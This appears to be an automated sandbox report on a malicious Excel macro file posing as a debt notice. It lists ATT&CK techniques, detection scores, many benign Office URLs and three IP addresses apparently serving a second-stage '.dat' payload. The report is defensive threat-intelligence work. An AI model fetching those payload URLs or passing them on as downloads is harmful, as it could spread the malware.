Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting32LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Extra Window Memory Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Outstanding-Debt-1754918061-05042021.xlsm2%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
http://45.153.229.23/44313,6048108796.dat5%VirustotalBrowse
http://45.153.229.23/44313,6048108796.dat0%Avira URL Cloudsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
http://5.34.179.36/44313,6048108796.dat0%Avira URL Cloudsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
http://91.211.91.81/44313,6048108796.dat0%Avira URL Cloudsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://45.153.229.23/44313,6048108796.datfalse
  • 5%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://5.34.179.36/44313,6048108796.datfalse
  • Avira URL Cloud: safe
unknown
http://91.211.91.81/44313,6048108796.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
    high
    https://login.microsoftonline.com/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
      high
      https://shell.suite.office.com:1443698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
          high
          https://autodiscover-s.outlook.com/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
              high
              https://cdn.entity.698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                    high
                    https://powerlift.acompli.net698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                      high
                      https://cortana.ai698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                high
                                https://api.aadrm.com/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                      high
                                      https://cr.office.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                            high
                                            https://graph.ppe.windows.net698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                            high
                                                            https://graph.windows.net698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                high
                                                                                                https://api.office.net698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drfalse
                                                                                                                                                high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                91.211.91.81
                                                                                                                                                unknownUkraine
                                                                                                                                                206638HOSTFORYUAfalse
                                                                                                                                                5.34.179.36
                                                                                                                                                unknownUkraine
                                                                                                                                                204957GREENFLOID-ASUAfalse
                                                                                                                                                45.153.229.23
                                                                                                                                                unknownRussian Federation
                                                                                                                                                25229VOLIA-ASUAfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                Analysis ID:404114
                                                                                                                                                Start date:04.05.2021
                                                                                                                                                Start time:18:17:26
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 5m 4s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:Outstanding-Debt-1754918061-05042021.xlsm
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:24
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • GSI enabled (VBA)
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal60.expl.evad.winXLSM@1/10@0/3
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xlsm
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
